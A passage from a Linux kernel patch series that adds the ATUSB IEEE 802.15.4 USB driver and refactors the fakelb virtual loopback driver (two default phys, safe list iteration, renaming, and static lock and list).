"atusb_in: URB error %d\n", urb->status); + } else { + atusb_in_good(urb); + } + + usb_anchor_urb(urb, &atusb->idle_urbs); + if (!atusb->shutdown) + schedule_delayed_work(&atusb->work, 0); +} + +/* ----- URB allocation/deallocation --------------------------------------- */ + +static void atusb_free_urbs(struct atusb *atusb) +{ + struct urb *urb; + + while (1) { + urb = usb_get_from_anchor(&atusb->idle_urbs); + if (!urb) + break; + if (urb->context) + kfree_skb(urb->context); + usb_free_urb(urb); + } +} + +static int atusb_alloc_urbs(struct atusb *atusb, int n) +{ + struct urb *urb; + + while (n) { + urb = usb_alloc_urb(0, GFP_KERNEL); + if (!urb) { + atusb_free_urbs(atusb); + return -ENOMEM; + } + usb_anchor_urb(urb, &atusb->idle_urbs); + n--; + } + return 0; +} + +/* ----- IEEE 802.15.4 interface operations -------------------------------- */ + +static void atusb_xmit_complete(struct urb *urb) +{ + dev_dbg(&urb->dev->dev, "atusb_xmit urb completed"); +} + +static int atusb_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) +{ + struct atusb *atusb = hw->priv; + struct usb_device *usb_dev = atusb->usb_dev; + int ret; + + dev_dbg(&usb_dev->dev, "atusb_xmit (%d)\n", skb->len); + atusb->tx_skb = skb; + atusb->tx_ack_seq++; + atusb->tx_dr.wIndex = cpu_to_le16(atusb->tx_ack_seq); + atusb->tx_dr.wLength = cpu_to_le16(skb->len); + + usb_fill_control_urb(atusb->tx_urb, usb_dev, + usb_sndctrlpipe(usb_dev, 0), + (unsigned char *)&atusb->tx_dr, skb->data, + skb->len, atusb_xmit_complete, NULL); + ret = usb_submit_urb(atusb->tx_urb, GFP_ATOMIC); + dev_dbg(&usb_dev->dev, "atusb_xmit done (%d)\n", ret); + return ret; +} + +static int atusb_channel(struct ieee802154_hw *hw, u8 page, u8 
channel) +{ + struct atusb *atusb = hw->priv; + int ret; + + /* This implicitly sets the CCA (Clear Channel Assessment) mode to 0, + * "Mode 3a, Carrier sense OR energy above threshold". + * We should probably make this configurable. @@@ + */ + ret = atusb_write_reg(atusb, RG_PHY_CC_CCA, channel); + if (ret < 0) + return ret; + msleep(1); /* @@@ ugly synchronization */ + return 0; +} + +static int atusb_ed(struct ieee802154_hw *hw, u8 *level) +{ + /* @@@ not used by the stack yet */ + *level = 0; + return 0; +} + +static int atusb_set_hw_addr_filt(struct ieee802154_hw *hw, + struct ieee802154_hw_addr_filt *filt, + unsigned long changed) +{ + struct atusb *atusb = hw->priv; + struct device *dev = &atusb->usb_dev->dev; + uint8_t reg; + + if (changed & IEEE802154_AFILT_SADDR_CHANGED) { + u16 addr = le16_to_cpu(filt->short_addr); + + dev_vdbg(dev, "atusb_set_hw_addr_filt called for saddr\n"); + atusb_write_reg(atusb, RG_SHORT_ADDR_0, addr); + atusb_write_reg(atusb, RG_SHORT_ADDR_1, addr >> 8); + } + + if (changed & IEEE802154_AFILT_PANID_CHANGED) { + u16 pan = le16_to_cpu(filt->pan_id); + + dev_vdbg(dev, "atusb_set_hw_addr_filt called for pan id\n"); + atusb_write_reg(atusb, RG_PAN_ID_0, pan); + atusb_write_reg(atusb, RG_PAN_ID_1, pan >> 8); + } + + if (changed & IEEE802154_AFILT_IEEEADDR_CHANGED) { + u8 i, addr[IEEE802154_EXTENDED_ADDR_LEN]; + + memcpy(addr, &filt->ieee_addr, IEEE802154_EXTENDED_ADDR_LEN); + dev_vdbg(dev, "atusb_set_hw_addr_filt called for IEEE addr\n"); + for (i = 0; i < 8; i++) + atusb_write_reg(atusb, RG_IEEE_ADDR_0 + i, addr[i]); + } + + if (changed & IEEE802154_AFILT_PANC_CHANGED) { + dev_vdbg(dev, + "atusb_set_hw_addr_filt called for panc change\n"); + reg = atusb_read_reg(atusb, SR_REG(SR_AACK_I_AM_COORD)); + if (filt->pan_coord) + reg |= SR_VALUE(SR_AACK_I_AM_COORD, 1); + else + reg &= ~SR_VALUE(SR_AACK_I_AM_COORD, 1); + atusb_write_reg(atusb, SR_REG(SR_AACK_I_AM_COORD), reg); + } + + return atusb_get_and_clear_error(atusb); +} + +static int atusb_start(struct ieee802154_hw *hw) +{ + struct atusb *atusb = hw->priv; + struct usb_device *usb_dev = atusb->usb_dev; + int ret; + + dev_dbg(&usb_dev->dev, "atusb_start\n"); + schedule_delayed_work(&atusb->work, 0); + atusb_command(atusb, ATUSB_RX_MODE, 1); + ret = atusb_get_and_clear_error(atusb); + if (ret < 0) + usb_kill_anchored_urbs(&atusb->idle_urbs); + return ret; +} + +static void atusb_stop(struct ieee802154_hw *hw) +{ + struct atusb *atusb = hw->priv; + struct usb_device *usb_dev = atusb->usb_dev; + + dev_dbg(&usb_dev->dev, "atusb_stop\n"); + usb_kill_anchored_urbs(&atusb->idle_urbs); + atusb_command(atusb, ATUSB_RX_MODE, 0); + atusb_get_and_clear_error(atusb); +} + +static struct ieee802154_ops atusb_ops = { + .owner = THIS_MODULE, + .xmit_async = atusb_xmit, + .ed = atusb_ed, + .set_channel = atusb_channel, + .start = atusb_start, + .stop = atusb_stop, + .set_hw_addr_filt = atusb_set_hw_addr_filt, +}; + +/* ----- Firmware and chip version information ----------------------------- */ + +static int atusb_get_and_show_revision(struct atusb *atusb) +{ + struct usb_device *usb_dev = atusb->usb_dev; + unsigned char buffer[3]; + int ret; + + /* Get a couple of the ATMega Firmware values */ + ret = atusb_control_msg(atusb, usb_rcvctrlpipe(usb_dev, 0), + ATUSB_ID, ATUSB_REQ_FROM_DEV, 0, 0, + buffer, 3, 1000); + if (ret >= 0) + dev_info(&usb_dev->dev, + "Firmware: major: %u, minor: %u, hardware type: %u\n", + buffer[0], buffer[1], buffer[2]); + + return ret; +} + +static int atusb_get_and_show_build(struct atusb *atusb) +{ + 
struct usb_device *usb_dev = atusb->usb_dev; + char build[ATUSB_BUILD_SIZE + 1]; + int ret; + + ret = atusb_control_msg(atusb, usb_rcvctrlpipe(usb_dev, 0), + ATUSB_BUILD, ATUSB_REQ_FROM_DEV, 0, 0, + build, ATUSB_BUILD_SIZE, 1000); + if (ret >= 0) { + build[ret] = 0; + dev_info(&usb_dev->dev, "Firmware: build %s\n", build); + } + + return ret; +} + +static int atusb_get_and_show_chip(struct atusb *atusb) +{ + struct usb_device *usb_dev = atusb->usb_dev; + uint8_t man_id_0, man_id_1, part_num, version_num; + + man_id_0 = atusb_read_reg(atusb, RG_MAN_ID_0); + man_id_1 = atusb_read_reg(atusb, RG_MAN_ID_1); + part_num = atusb_read_reg(atusb, RG_PART_NUM); + version_num = atusb_read_reg(atusb, RG_VERSION_NUM); + + if (atusb->err) + return atusb->err; + + if ((man_id_1 << 8 | man_id_0) != ATUSB_JEDEC_ATMEL) { + dev_err(&usb_dev->dev, + "non-Atmel transceiver xxxx%02x%02x\n", + man_id_1, man_id_0); + goto fail; + } + if (part_num != 3) { + dev_err(&usb_dev->dev, + "unexpected transceiver, part 0x%02x version 0x%02x\n", + part_num, version_num); + goto fail; + } + + dev_info(&usb_dev->dev, "ATUSB: AT86RF231 version %d\n", version_num); + + return 0; + +fail: + atusb->err = -ENODEV; + return -ENODEV; +} + +/* ----- Setup ------------------------------------------------------------- */ + +static int atusb_probe(struct usb_interface *interface, + const struct usb_device_id *id) +{ + struct usb_device *usb_dev = interface_to_usbdev(interface); + struct ieee802154_hw *hw; + struct atusb *atusb = NULL; + int ret = -ENOMEM; + + hw = ieee802154_alloc_hw(sizeof(struct atusb), &atusb_ops); + if (!hw) + return -ENOMEM; + + atusb = hw->priv; + atusb->hw = hw; + atusb->usb_dev = usb_get_dev(usb_dev); + usb_set_intfdata(interface, atusb); + + atusb->shutdown = 0; + atusb->err = 0; + INIT_DELAYED_WORK(&atusb->work, atusb_work_urbs); + init_usb_anchor(&atusb->idle_urbs); + init_usb_anchor(&atusb->rx_urbs); + + if (atusb_alloc_urbs(atusb, ATUSB_NUM_RX_URBS)) + goto fail; + + atusb->tx_dr.bRequestType = ATUSB_REQ_TO_DEV; + atusb->tx_dr.bRequest = ATUSB_TX; + atusb->tx_dr.wValue = cpu_to_le16(0); + + atusb->tx_urb = usb_alloc_urb(0, GFP_ATOMIC); + if (!atusb->tx_urb) + goto fail; + + hw->parent = &usb_dev->dev; + hw->flags = IEEE802154_HW_TX_OMIT_CKSUM | IEEE802154_HW_AFILT; + + hw->phy->current_page = 0; + hw->phy->current_channel = 11; /* reset default */ + hw->phy->supported.channels[0] = 0x7FFF800; + ieee802154_random_extended_addr(&hw->phy->perm_extended_addr); + + atusb_command(atusb, ATUSB_RF_RESET, 0); + atusb_get_and_show_chip(atusb); + atusb_get_and_show_revision(atusb); + atusb_get_and_show_build(atusb); + ret = atusb_get_and_clear_error(atusb); + if (ret) { + dev_err(&atusb->usb_dev->dev, + "%s: initialization failed, error = %d\n", + __func__, ret); + goto fail; + } + + ret = ieee802154_register_hw(hw); + if (ret) + goto fail; + + /* If we just powered on, we're now in P_ON and need to enter TRX_OFF + * explicitly. Any resets after that will send us straight to TRX_OFF, + * making the command below redundant. + */ + atusb_write_reg(atusb, RG_TRX_STATE, STATE_FORCE_TRX_OFF); + msleep(1); /* reset => TRX_OFF, tTR13 = 37 us */ + +#if 0 + /* Calculating the maximum time available to empty the frame buffer + * on reception: + * + * According to [1], the inter-frame gap is + * R * 20 * 16 us + 128 us + * where R is a random number from 0 to 7. Furthermore, we have 20 bit + * times (80 us at 250 kbps) of SHR of the next frame before the + * transceiver begins storing data in the frame buffer. 
+ * + * This yields a minimum time of 208 us between the last data of a + * frame and the first data of the next frame. This time is further + * reduced by interrupt latency in the atusb firmware. + * + * atusb currently needs about 500 us to retrieve a maximum-sized + * frame. We therefore have to allow reception of a new frame to begin + * while we retrieve the previous frame. + * + * [1] "JN-AN-1035 Calculating data rates in an IEEE 802.15.4-based + * network", Jennic 2006. + * http://www.jennic.com/download_file.php?supportFile=JN-AN-1035%20Calculating%20802-15-4%20Data%20Rates-1v0.pdf + */ + + atusb_write_reg(atusb, + SR_REG(SR_RX_SAFE_MODE), SR_VALUE(SR_RX_SAFE_MODE, 1)); +#endif + atusb_write_reg(atusb, RG_IRQ_MASK, 0xff); + + ret = atusb_get_and_clear_error(atusb); + if (!ret) + return 0; + + dev_err(&atusb->usb_dev->dev, + "%s: setup failed, error = %d\n", + __func__, ret); + + ieee802154_unregister_hw(hw); +fail: + atusb_free_urbs(atusb); + usb_kill_urb(atusb->tx_urb); + usb_free_urb(atusb->tx_urb); + usb_put_dev(usb_dev); + ieee802154_free_hw(hw); + return ret; +} + +static void atusb_disconnect(struct usb_interface *interface) +{ + struct atusb *atusb = usb_get_intfdata(interface); + + dev_dbg(&atusb->usb_dev->dev, "atusb_disconnect\n"); + + atusb->shutdown = 1; + cancel_delayed_work_sync(&atusb->work); + + usb_kill_anchored_urbs(&atusb->rx_urbs); + atusb_free_urbs(atusb); + usb_kill_urb(atusb->tx_urb); + usb_free_urb(atusb->tx_urb); + + ieee802154_unregister_hw(atusb->hw); + + ieee802154_free_hw(atusb->hw); + + usb_set_intfdata(interface, NULL); + usb_put_dev(atusb->usb_dev); + + pr_debug("atusb_disconnect done\n"); +} + +/* The devices we work with */ +static const struct usb_device_id atusb_device_table[] = { + { + .match_flags = USB_DEVICE_ID_MATCH_DEVICE | + USB_DEVICE_ID_MATCH_INT_INFO, + .idVendor = ATUSB_VENDOR_ID, + .idProduct = ATUSB_PRODUCT_ID, + .bInterfaceClass = USB_CLASS_VENDOR_SPEC + }, + /* end with null element */ + {} +}; +MODULE_DEVICE_TABLE(usb, atusb_device_table); + +static struct usb_driver atusb_driver = { + .name = "atusb", + .probe = atusb_probe, + .disconnect = atusb_disconnect, + .id_table = atusb_device_table, +}; +module_usb_driver(atusb_driver); + +MODULE_AUTHOR("Alexander Aring "); +MODULE_AUTHOR("Richard Sharpe "); +MODULE_AUTHOR("Stefan Schmidt "); +MODULE_AUTHOR("Werner Almesberger "); +MODULE_DESCRIPTION("ATUSB IEEE 802.15.4 Driver"); +MODULE_LICENSE("GPL"); diff --git a/drivers/net/ieee802154/atusb.h b/drivers/net/ieee802154/atusb.h new file mode 100644 index 000000000000..0690edcad57b --- /dev/null +++ b/drivers/net/ieee802154/atusb.h @@ -0,0 +1,84 @@ +/* + * atusb.h - Definitions shared between kernel and ATUSB firmware + * + * Written 2013 by Werner Almesberger + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License as + * published by the Free Software Foundation, version 2, or + * (at your option) any later version. + * + * This file should be identical for kernel and firmware. + * Kernel: drivers/net/ieee802154/atusb.h + * Firmware: ben-wpan/atusb/fw/include/atusb/atusb.h + */ + +#ifndef _ATUSB_H +#define _ATUSB_H + +#define ATUSB_VENDOR_ID 0x20b7 /* Qi Hardware*/ +#define ATUSB_PRODUCT_ID 0x1540 /* 802.15.4, device 0 */ + /* -- - - */ + +#define ATUSB_BUILD_SIZE 256 /* maximum build version/date message length */ + +/* Commands to our device. 
Make sure this is synced with the firmware */ +enum atusb_requests { + ATUSB_ID = 0x00, /* system status/control grp */ + ATUSB_BUILD, + ATUSB_RESET, + ATUSB_RF_RESET = 0x10, /* debug/test group */ + ATUSB_POLL_INT, + ATUSB_TEST, /* atusb-sil only */ + ATUSB_TIMER, + ATUSB_GPIO, + ATUSB_SLP_TR, + ATUSB_GPIO_CLEANUP, + ATUSB_REG_WRITE = 0x20, /* transceiver group */ + ATUSB_REG_READ, + ATUSB_BUF_WRITE, + ATUSB_BUF_READ, + ATUSB_SRAM_WRITE, + ATUSB_SRAM_READ, + ATUSB_SPI_WRITE = 0x30, /* SPI group */ + ATUSB_SPI_READ1, + ATUSB_SPI_READ2, + ATUSB_SPI_WRITE2_SYNC, + ATUSB_RX_MODE = 0x40, /* HardMAC group */ + ATUSB_TX, +}; + +/* Direction bRequest wValue wIndex wLength + * + * ->host ATUSB_ID - - 3 + * ->host ATUSB_BUILD - - #bytes + * host-> ATUSB_RESET - - 0 + * + * host-> ATUSB_RF_RESET - - 0 + * ->host ATUSB_POLL_INT - - 1 + * host-> ATUSB_TEST - - 0 + * ->host ATUSB_TIMER - - #bytes (6) + * ->host ATUSB_GPIO dir+data mask+p# 3 + * host-> ATUSB_SLP_TR - - 0 + * host-> ATUSB_GPIO_CLEANUP - - 0 + * + * host-> ATUSB_REG_WRITE value addr 0 + * ->host ATUSB_REG_READ - addr 1 + * host-> ATUSB_BUF_WRITE - - #bytes + * ->host ATUSB_BUF_READ - - #bytes + * host-> ATUSB_SRAM_WRITE - addr #bytes + * ->host ATUSB_SRAM_READ - addr #bytes + * + * host-> ATUSB_SPI_WRITE byte0 byte1 #bytes + * ->host ATUSB_SPI_READ1 byte0 - #bytes + * ->host ATUSB_SPI_READ2 byte0 byte1 #bytes + * ->host ATUSB_SPI_WRITE2_SYNC byte0 byte1 0/1 + * + * host-> ATUSB_RX_MODE on - 0 + * host-> ATUSB_TX flags ack_seq #bytes + */ + +#define ATUSB_REQ_FROM_DEV (USB_TYPE_VENDOR | USB_DIR_IN) +#define ATUSB_REQ_TO_DEV (USB_TYPE_VENDOR | USB_DIR_OUT) + +#endif /* !_ATUSB_H */ From 7e57905ba6c825f38f146b5f8974c2ce27f299bb Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:58 +0200 Subject: [PATCH 099/872] fakelb: creating two virtual phys per default This patch change the default virtual wpan phys of fakelb driver from one to two. To have one virtual phy makes no sense, because it need at least two virtual phy's to speak to each other. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index 230f7da02165..cc1c7df25009 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -27,7 +27,7 @@ #include #include -static int numlbs = 1; +static int numlbs = 2; struct fakelb_dev_priv { struct ieee802154_hw *hw; From 3186d3d7aec3b2f242abbc0a0219226e7705c905 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:59 +0200 Subject: [PATCH 100/872] fakelb: use list_for_each_entry_safe Iterate and removing items from a list, we should use list_for_each_entry_safe instead list_for_each_entry to avoid accidents by removing. 
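The _safe variant keeps a lookahead cursor, so unlinking the current entry cannot break the walk. A minimal sketch of the pattern (illustrative only; struct item and the helper are made up):

#include <linux/list.h>
#include <linux/slab.h>

struct item {
	struct list_head list;
};

/* Hypothetical helper: delete every entry while iterating over the list. */
static void example_remove_all(struct list_head *head)
{
	struct item *it, *tmp;

	list_for_each_entry_safe(it, tmp, head, list) {
		list_del(&it->list);	/* safe: tmp already points at the next entry */
		kfree(it);
	}
}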
Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index cc1c7df25009..66f99c4f9768 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -215,7 +215,7 @@ static void fakelb_del(struct fakelb_dev_priv *priv) static int fakelb_probe(struct platform_device *pdev) { struct fakelb_priv *priv; - struct fakelb_dev_priv *dp; + struct fakelb_dev_priv *dp, *tmp; int err = -ENOMEM; int i; @@ -238,7 +238,7 @@ static int fakelb_probe(struct platform_device *pdev) return 0; err_slave: - list_for_each_entry(dp, &priv->list, list) + list_for_each_entry_safe(dp, tmp, &priv->list, list) fakelb_del(dp); err_alloc: return err; From db3f5d0df9af1e5965e64595595a6a719c42fcf3 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:45:00 +0200 Subject: [PATCH 101/872] fakelb: rename fakelb_dev_priv to fakelb_phy This patch renames fakelb_dev_priv to fakelb_phy. We don't faking devices here, we fake wpan phys. This avoids also confusing with the variable priv, which is used several times in this driver to represent this structure. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 93 +++++++++++++++++---------------- 1 file changed, 47 insertions(+), 46 deletions(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index 66f99c4f9768..5c4fbb861eb0 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -29,7 +29,7 @@ static int numlbs = 2; -struct fakelb_dev_priv { +struct fakelb_phy { struct ieee802154_hw *hw; struct list_head list; @@ -62,36 +62,37 @@ fakelb_hw_channel(struct ieee802154_hw *hw, u8 page, u8 channel) } static void -fakelb_hw_deliver(struct fakelb_dev_priv *priv, struct sk_buff *skb) +fakelb_hw_deliver(struct fakelb_phy *phy, struct sk_buff *skb) { struct sk_buff *newskb; - spin_lock(&priv->lock); - if (priv->working) { + spin_lock(&phy->lock); + if (phy->working) { newskb = pskb_copy(skb, GFP_ATOMIC); if (newskb) - ieee802154_rx_irqsafe(priv->hw, newskb, 0xcc); + ieee802154_rx_irqsafe(phy->hw, newskb, 0xcc); } - spin_unlock(&priv->lock); + spin_unlock(&phy->lock); } static int fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) { - struct fakelb_dev_priv *priv = hw->priv; - struct fakelb_priv *fake = priv->fake; + struct fakelb_phy *current_phy = hw->priv; + struct fakelb_priv *fake = current_phy->fake; read_lock_bh(&fake->lock); - if (priv->list.next == priv->list.prev) { + if (current_phy->list.next == current_phy->list.prev) { /* we are the only one device */ - fakelb_hw_deliver(priv, skb); + fakelb_hw_deliver(current_phy, skb); } else { - struct fakelb_dev_priv *dp; - list_for_each_entry(dp, &priv->fake->list, list) { - if (dp != priv && - (dp->hw->phy->current_channel == - priv->hw->phy->current_channel)) - fakelb_hw_deliver(dp, skb); + struct fakelb_phy *phy; + + list_for_each_entry(phy, ¤t_phy->fake->list, list) { + if (current_phy != phy && + (phy->hw->phy->current_channel == + current_phy->hw->phy->current_channel)) + fakelb_hw_deliver(phy, skb); } } read_unlock_bh(&fake->lock); @@ -101,26 +102,26 @@ fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) static int fakelb_hw_start(struct ieee802154_hw *hw) { - struct fakelb_dev_priv *priv = hw->priv; + struct fakelb_phy *phy = hw->priv; int ret = 0; - spin_lock(&priv->lock); - if 
(priv->working) + spin_lock(&phy->lock); + if (phy->working) ret = -EBUSY; else - priv->working = 1; - spin_unlock(&priv->lock); + phy->working = 1; + spin_unlock(&phy->lock); return ret; } static void fakelb_hw_stop(struct ieee802154_hw *hw) { - struct fakelb_dev_priv *priv = hw->priv; + struct fakelb_phy *phy = hw->priv; - spin_lock(&priv->lock); - priv->working = 0; - spin_unlock(&priv->lock); + spin_lock(&phy->lock); + phy->working = 0; + spin_unlock(&phy->lock); } static const struct ieee802154_ops fakelb_ops = { @@ -138,16 +139,16 @@ MODULE_PARM_DESC(numlbs, " number of pseudo devices"); static int fakelb_add_one(struct device *dev, struct fakelb_priv *fake) { - struct fakelb_dev_priv *priv; + struct fakelb_phy *phy; int err; struct ieee802154_hw *hw; - hw = ieee802154_alloc_hw(sizeof(*priv), &fakelb_ops); + hw = ieee802154_alloc_hw(sizeof(*phy), &fakelb_ops); if (!hw) return -ENOMEM; - priv = hw->priv; - priv->hw = hw; + phy = hw->priv; + phy->hw = hw; /* 868 MHz BPSK 802.15.4-2003 */ hw->phy->supported.channels[0] |= 1; @@ -180,10 +181,10 @@ static int fakelb_add_one(struct device *dev, struct fakelb_priv *fake) /* 950 MHz GFSK 802.15.4d-2009 */ hw->phy->supported.channels[6] |= 0x3ffc00; - INIT_LIST_HEAD(&priv->list); - priv->fake = fake; + INIT_LIST_HEAD(&phy->list); + phy->fake = fake; - spin_lock_init(&priv->lock); + spin_lock_init(&phy->lock); hw->parent = dev; @@ -192,30 +193,30 @@ static int fakelb_add_one(struct device *dev, struct fakelb_priv *fake) goto err_reg; write_lock_bh(&fake->lock); - list_add_tail(&priv->list, &fake->list); + list_add_tail(&phy->list, &fake->list); write_unlock_bh(&fake->lock); return 0; err_reg: - ieee802154_free_hw(priv->hw); + ieee802154_free_hw(phy->hw); return err; } -static void fakelb_del(struct fakelb_dev_priv *priv) +static void fakelb_del(struct fakelb_phy *phy) { - write_lock_bh(&priv->fake->lock); - list_del(&priv->list); - write_unlock_bh(&priv->fake->lock); + write_lock_bh(&phy->fake->lock); + list_del(&phy->list); + write_unlock_bh(&phy->fake->lock); - ieee802154_unregister_hw(priv->hw); - ieee802154_free_hw(priv->hw); + ieee802154_unregister_hw(phy->hw); + ieee802154_free_hw(phy->hw); } static int fakelb_probe(struct platform_device *pdev) { struct fakelb_priv *priv; - struct fakelb_dev_priv *dp, *tmp; + struct fakelb_phy *phy, *tmp; int err = -ENOMEM; int i; @@ -238,8 +239,8 @@ static int fakelb_probe(struct platform_device *pdev) return 0; err_slave: - list_for_each_entry_safe(dp, tmp, &priv->list, list) - fakelb_del(dp); + list_for_each_entry_safe(phy, tmp, &priv->list, list) + fakelb_del(phy); err_alloc: return err; } @@ -247,10 +248,10 @@ static int fakelb_probe(struct platform_device *pdev) static int fakelb_remove(struct platform_device *pdev) { struct fakelb_priv *priv = platform_get_drvdata(pdev); - struct fakelb_dev_priv *dp, *temp; + struct fakelb_phy *phy, *temp; - list_for_each_entry_safe(dp, temp, &priv->list, list) - fakelb_del(dp); + list_for_each_entry_safe(phy, temp, &priv->list, list) + fakelb_del(phy); return 0; } From 9f8b97f888445b737ea3716ca53498663e18d971 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:45:01 +0200 Subject: [PATCH 102/872] fakelb: don't deliver when one phy A real phy don't transmit the transmitted frame back to the phy. This behaviour will confuse the 6LoWPAN and the upper IPv6 neighbour discovery cache. We need now at least two virtual phy's to creating a virtual wpan network. 
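With that rule the transmit path simply skips the sending phy; a rough sketch of the resulting loop (illustrative only; the lock, list and helper names are made up, not the fakelb symbols):

#include <linux/list.h>
#include <linux/skbuff.h>
#include <linux/spinlock.h>

struct example_phy {
	struct list_head list;
	u8 channel;
};

static LIST_HEAD(example_phys);
static DEFINE_RWLOCK(example_lock);

/* Hypothetical receive hand-off, elided in this sketch. */
static void example_deliver(struct example_phy *phy, struct sk_buff *skb)
{
}

/* Hypothetical transmit hook: deliver to every other phy on the same channel. */
static void example_xmit(struct example_phy *current_phy, struct sk_buff *skb)
{
	struct example_phy *phy;

	read_lock_bh(&example_lock);
	list_for_each_entry(phy, &example_phys, list) {
		if (phy == current_phy)
			continue;	/* a real radio does not hear itself */

		if (phy->channel == current_phy->channel)
			example_deliver(phy, skb);
	}
	read_unlock_bh(&example_lock);
}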
Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 20 ++++++++------------ 1 file changed, 8 insertions(+), 12 deletions(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index 5c4fbb861eb0..d5fb77678349 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -80,20 +80,16 @@ fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) { struct fakelb_phy *current_phy = hw->priv; struct fakelb_priv *fake = current_phy->fake; + struct fakelb_phy *phy; read_lock_bh(&fake->lock); - if (current_phy->list.next == current_phy->list.prev) { - /* we are the only one device */ - fakelb_hw_deliver(current_phy, skb); - } else { - struct fakelb_phy *phy; - - list_for_each_entry(phy, ¤t_phy->fake->list, list) { - if (current_phy != phy && - (phy->hw->phy->current_channel == - current_phy->hw->phy->current_channel)) - fakelb_hw_deliver(phy, skb); - } + list_for_each_entry(phy, ¤t_phy->fake->list, list) { + if (current_phy == phy) + continue; + + if (phy->hw->phy->current_channel == + current_phy->hw->phy->current_channel) + fakelb_hw_deliver(phy, skb); } read_unlock_bh(&fake->lock); From 3335d98c69b1b09b963d09c8475c40bd8988c994 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:45:02 +0200 Subject: [PATCH 103/872] fakelb: declare rwlock static This patch moves the rwlock declarition into a static variable. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 16 +++++++--------- 1 file changed, 7 insertions(+), 9 deletions(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index d5fb77678349..43370fb48cf6 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -28,6 +28,7 @@ #include static int numlbs = 2; +static DEFINE_RWLOCK(fakelb_lock); struct fakelb_phy { struct ieee802154_hw *hw; @@ -41,7 +42,6 @@ struct fakelb_phy { struct fakelb_priv { struct list_head list; - rwlock_t lock; }; static int @@ -79,10 +79,9 @@ static int fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) { struct fakelb_phy *current_phy = hw->priv; - struct fakelb_priv *fake = current_phy->fake; struct fakelb_phy *phy; - read_lock_bh(&fake->lock); + read_lock_bh(&fakelb_lock); list_for_each_entry(phy, ¤t_phy->fake->list, list) { if (current_phy == phy) continue; @@ -91,7 +90,7 @@ fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) current_phy->hw->phy->current_channel) fakelb_hw_deliver(phy, skb); } - read_unlock_bh(&fake->lock); + read_unlock_bh(&fakelb_lock); return 0; } @@ -188,9 +187,9 @@ static int fakelb_add_one(struct device *dev, struct fakelb_priv *fake) if (err) goto err_reg; - write_lock_bh(&fake->lock); + write_lock_bh(&fakelb_lock); list_add_tail(&phy->list, &fake->list); - write_unlock_bh(&fake->lock); + write_unlock_bh(&fakelb_lock); return 0; @@ -201,9 +200,9 @@ static int fakelb_add_one(struct device *dev, struct fakelb_priv *fake) static void fakelb_del(struct fakelb_phy *phy) { - write_lock_bh(&phy->fake->lock); + write_lock_bh(&fakelb_lock); list_del(&phy->list); - write_unlock_bh(&phy->fake->lock); + write_unlock_bh(&fakelb_lock); ieee802154_unregister_hw(phy->hw); ieee802154_free_hw(phy->hw); @@ -222,7 +221,6 @@ static int fakelb_probe(struct platform_device *pdev) goto err_alloc; INIT_LIST_HEAD(&priv->list); - rwlock_init(&priv->lock); for (i = 0; i < numlbs; i++) { err = fakelb_add_one(&pdev->dev, priv); From b82b99f16bc207291b14228441cfffbfd23d5f49 
Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:45:03 +0200 Subject: [PATCH 104/872] fakelb: declare fakelb list static This patch moves the fakelb list of all registered phy's in a static declaration in the fakelb driver. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 32 +++++++------------------------- 1 file changed, 7 insertions(+), 25 deletions(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index 43370fb48cf6..c7e7d506224f 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -29,21 +29,17 @@ static int numlbs = 2; static DEFINE_RWLOCK(fakelb_lock); +static LIST_HEAD(fakelb_phys); struct fakelb_phy { struct ieee802154_hw *hw; struct list_head list; - struct fakelb_priv *fake; spinlock_t lock; bool working; }; -struct fakelb_priv { - struct list_head list; -}; - static int fakelb_hw_ed(struct ieee802154_hw *hw, u8 *level) { @@ -82,7 +78,7 @@ fakelb_hw_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) struct fakelb_phy *phy; read_lock_bh(&fakelb_lock); - list_for_each_entry(phy, ¤t_phy->fake->list, list) { + list_for_each_entry(phy, &fakelb_phys, list) { if (current_phy == phy) continue; @@ -132,7 +128,7 